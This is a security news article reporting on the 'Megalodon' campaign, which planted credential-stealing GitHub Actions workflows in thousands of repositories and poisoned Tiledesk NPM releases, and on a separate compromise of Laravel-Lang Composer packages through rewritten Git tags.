Cybersecurity researchers have uncovered a large-scale supply chain attack that compromised more than 5,500 GitHub repositories via malicious automated commits. The campaign, dubbed “Megalodon,” targeted GitHub Actions workflows to steal sensitive credentials, tokens, and cloud secrets from infected systems.
According to security firm SafeDep, attackers injected over 5,700 malicious commits into repositories within a six-hour period on May 18 using throwaway accounts and forged author identities. The malicious payloads added hidden GitHub Actions workflows that either triggered automatically on push and pull requests or silently replaced existing workflows to create dormant backdoors.
The malware exfiltrated a wide range of sensitive information, including AWS credentials, Google Cloud and Azure tokens, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, and GitHub and GitLab CI/CD tokens.
Researchers traced the campaign to compromised versions of the open-source chatbot platform called 'Tiledesk,' which were published to NPM between May 19 and May 21. The attacker did not breach the maintainer’s NPM account directly. Instead, the threat actor compromised the GitHub repository and poisoned the source code before the maintainer unknowingly published the infected packages.
The malicious commits were attributed to a user identified as “build-bot.” SafeDep’s investigation linked nearly 5,700 commits across two associated email addresses, all created on the same day.
Researchers also warned that the attacker exploited GitHub’s workflow_dispatch feature, which allows workflows to be triggered through the GitHub API and bypasses certain anti-recursion protections. This could enable attackers to reactivate dormant backdoors later using stolen GitHub tokens.
In a separate incident, four popular Composer packages maintained by the Laravel-Lang organization were compromised in a supply chain attack after hackers rewrote all their Git tags with malicious code. The affected packages (laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions) are popular localization libraries used in Laravel applications. The attack began on May 22, when attackers published malicious version tags during a brief 15-minute window. Researchers say more than 700 historical versions across the packages were modified, potentially exposing any applications that updated or installed the packages during that period to malware.